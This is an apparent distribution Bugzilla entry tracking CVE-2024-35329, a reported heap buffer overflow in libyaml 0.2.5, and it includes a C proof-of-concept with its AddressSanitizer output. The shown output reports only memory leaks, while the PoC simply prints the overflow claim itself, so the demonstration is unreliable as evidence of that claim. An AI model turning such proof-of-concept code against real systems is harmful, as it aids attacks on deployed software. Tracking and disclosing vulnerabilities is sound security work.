Bugzilla – Bug 1226195
VUL-0: CVE-2024-35329: libyaml: vulnerable to a heap-based Buffer Overflow in yaml_document_add_sequence in api.c
Last modified: 2024-06-12 12:23:16 UTC
libyaml 0.2.5 is vulnerable to a heap-based Buffer Overflow in yaml_document_add_sequence in api.c. References: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2024-35329 https://www.cve.org/CVERecord?id=CVE-2024-35329 https://drive.google.com/file/d/1xgQ9hJ7Sn5RVEsdMGvIy0s3b_bg3Wyk-/view?usp=sharing https://github.com/yaml/libyaml/releases/tag/0.2.5 https://bugzilla.redhat.com/show_bug.cgi?id=2291258
Reproducer: https://drive.google.com/file/d/1xgQ9hJ7Sn5RVEsdMGvIy0s3b_bg3Wyk-/view /* Build: * gcc -fsanitize=address -Wall -lyaml -o poc poc.c */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <yaml.h> void poc() { yaml_document_t document; memset(&document, 0, sizeof(yaml_document_t)); yaml_char_t *anchor = "rsslab"; yaml_char_t *tag = "tag:yaml.org,2002:str"; int style = YAML_ANY_SEQUENCE_STYLE; yaml_document_add_sequence(&document, tag, style); } int main(int argc, char *argv[]) { printf("heap-buffer-overflow on libyaml/src/api.c:1274:10\n"); poc(); return 0; } # ./poc heap-buffer-overflow on libyaml/src/api.c:1274:10 ================================================================= ==1524==ERROR: LeakSanitizer: detected memory leaks Direct leak of 64 byte(s) in 1 object(s) allocated from: #0 0x7fcdf58ec110 in malloc (/usr/lib64/libasan.so.4+0xdc110) #1 0x7fcdf5408d81 in yaml_document_add_sequence (/usr/lib64/libyaml-0.so.2+0x8d81) Direct leak of 22 byte(s) in 1 object(s) allocated from: #0 0x7fcdf5886e30 in __interceptor_strdup (/usr/lib64/libasan.so.4+0x76e30) #1 0x7fcdf5408d6f in yaml_document_add_sequence (/usr/lib64/libyaml-0.so.2+0x8d6f) Direct leak of 1 byte(s) in 1 object(s) allocated from: #0 0x7fcdf58ec110 in malloc (/usr/lib64/libasan.so.4+0xdc110) #1 0x7fcdf54067ad in yaml_stack_extend (/usr/lib64/libyaml-0.so.2+0x67ad) SUMMARY: AddressSanitizer: 87 byte(s) leaked in 3 allocation(s).